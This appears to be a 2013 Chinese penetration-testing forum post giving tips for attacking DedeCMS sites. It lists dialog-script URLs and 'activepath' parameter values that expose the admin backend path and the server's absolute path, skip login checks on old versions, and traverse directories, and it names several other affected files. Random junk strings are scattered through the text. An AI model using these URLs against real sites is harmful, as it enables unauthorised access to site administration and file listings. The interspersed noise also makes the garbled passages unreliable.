中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]
作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理' [; l- m% f5 k* u
5 Q9 n1 v" S) t; d
员帐号,新版本的就直接转向了后台.- O- T' \9 z5 R! r! ^  u6 f
) E" u" ~* C* G& C
2.include/dialog/config.php会爆出后台管理路径  Y6 E" `/ w5 V9 m$ m! h/ o9 n

7 M0 f% W" Z' C2 ^- Y1 @3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录: H( O& W) O+ z/ ^- d2 H0 T/ X4 I/ G
- H4 H7 d) C6 J
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
$ K1 Q3 F5 i: x9 V. S  n, X1 s3 ^4 k, k
! G  g  Z, p  y. H4 z5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
" G2 T. I: x& f9 ?3 |, L( @" l
9 M, {/ H6 c/ t9 e( M到根目录去.不过这些版本的访问地址有些不同.
; Z4 B) r2 q7 Q地址为require/dialog/select_soft.php?activepath=/././././././././
8 D  e, _0 }: r' w4 @% A9 Z
$ ]8 y. x8 r1 n' u" @6 \5 P, }2 ~3 ^include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
/ v$ L8 U* d7 t' ]存在相同问题的文件还有  ~( O4 {4 R6 d- d
include\dialog\select_images.php
! C( p! ^+ m' z8 I6 A8 P% G6 Minclude\dialog\select_media.php
1 M( o7 ^- \5 o) sinclude\dialog\select_templets.php​8 m* i/ ?3 o) g5 a' }' i




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2